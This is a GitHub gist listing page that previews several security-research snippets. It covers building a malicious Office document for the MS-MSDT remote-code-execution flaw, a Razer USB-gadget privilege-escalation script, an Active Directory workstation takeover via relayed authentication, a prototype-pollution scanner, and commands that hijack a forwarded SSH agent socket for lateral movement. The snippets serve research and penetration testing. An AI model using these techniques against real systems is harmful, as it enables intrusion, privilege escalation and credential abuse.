Skip to content

Instantly share code, notes, and snippets.

View b00ls0ck3t's full-sized avatar

lalo.pores b00ls0ck3t

48 followers · 259 following
View GitHub Profile
@timb-machine
timb-machine / linux-malware to ATTACK.md
Last active August 23, 2022 09:57
linux-malware to ATTACK.md

Credential Access

T1556.003: Pluggable Authentication Modules

T1003: OS Credential Dumping

@tothi
tothi / ms-msdt.MD
Last active June 16, 2025 21:37
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
@tothi
tothi / usbgadget_razer.sh
Created August 22, 2021 09:52
Razer USB gadget on Android for Local Privilege Escalation on Windows
# MINIMAL USB gadget setup using CONFIGFS for simulating Razer Gaming HID
# devices for triggering the vulnerable Windows Driver installer
# credits for the Windows Driver install vuln: @j0nh4t
#
# https://twitter.com/j0nh4t/status/1429049506021138437
# https://twitter.com/an0n_r0/status/1429263450748895236
#
# the script was developed & tested on Android LineageOS 18.1
@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active August 25, 2025 14:06
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@R0X4R
R0X4R / protpscan.sh
Created July 5, 2021 09:45
A Prototype pollution vulnerability scanner
#!/bin/bash
targets=$1
mkdir -p protpscan
# requirements: https://github.com/detectify/page-fetch, https://github.com/tomnomnom/waybackurls, https://github.com/bp0lr/gauplus, https://github.com/R0X4R/Fuzzy, https://github.com/jaeles-project/gospider, https://snapcraft.io/chromium
# usage: subfinder -d target.com -all -silent | httpx -silent | anew -q /home/targets.txt && ./protpscan.sh /home/targets.txt
cd protpscan 2> /dev/null
echo -e "Total $(cat $targets | wc -l) domains loaded to scan"
echo -e "Increasing scope..."
xargs -a $targets -P 50 -I % bash -c "echo % | waybackurls" 2> /dev/null | anew -q wayback.txt
cat $targets | gauplus --random-agent -b eot,jpg,jpeg,gif,css,tif,tiff,png,ttf,otf,woff,woff2,ico,pdf,svg,txt -t 300 -o gauplus.txt &> /dev/null
@hartescout
hartescout / reference.txt
Last active March 4, 2023 00:15
macOS Internals, Reversing, and Analysis reference I've found essential.
## In no particular order. I'm pulling these from a bookmark folder, I'll work on labeling as I have time. Hope these help. Will be mixing in Linux reference as well.
Sidenote: the macOS Internals series is amazing, although might be out of reach for some. However if having a hard time deciding (I definitely way) and in budget, In my opinion, they are worth the price. I've worked through Volume II, waiting on Volume III.
As always, most of what we need in our world can be found open sourced and provided by some of the brightest, but it can be a frustrating journey finding material.
https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought/
http://timetobleed.com/dynamic-linking-elf-vs-mach-o/
https://github.com/apple/darwin-xnu
https://opensource.apple.com/source/xnu/
https://developer.apple.com/library/archive/documentation/Darwin/Conceptual/KernelProgramming/Architecture/Architecture.html
@fransr
fransr / logger.js
Last active July 17, 2025 13:47
logger.js for hunting script gadgets. More info about script gadgets: https://github.com/google/security-research-pocs/tree/master/script-gadgets (Sebastian Lekies / Eduardo Vela Nava / Krzysztof Kotowicz)
var logger = console.trace;
// ELEMENT
;(getElementByIdCopy => {
Element.prototype.getElementById = function(q) {
logger('getElementById', q, this, this.innerHTML);
return Reflect.apply(getElementByIdCopy, this, [q])
}
})(Element.prototype.getElementById)
@str0my
str0my / turbointruder.py
Created February 17, 2021 13:30
@Agarri_FR challenge
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=5,
engine=Engine.BURP,
pipeline=False
)
for word in "0123456789abcdef":
engine.queue(target.req, word.rstrip())
@fransr
fransr / customcsrf.py
Created February 16, 2021 08:30
Hackvertor Custom CSRF tag
import httplib
import urllib
http = httplib.HTTPSConnection('example.com', 443)
cookie = 'your=cookies';
http.request("GET", "/api/v1/csrf", "", {
'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36',
'referer': 'https://example.com/',
@int0x80
int0x80 / SSH Agent Forwarding.md
Created January 7, 2021 00:59

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh [email protected]

user@internal:~$ hostname -f
internal.company.tld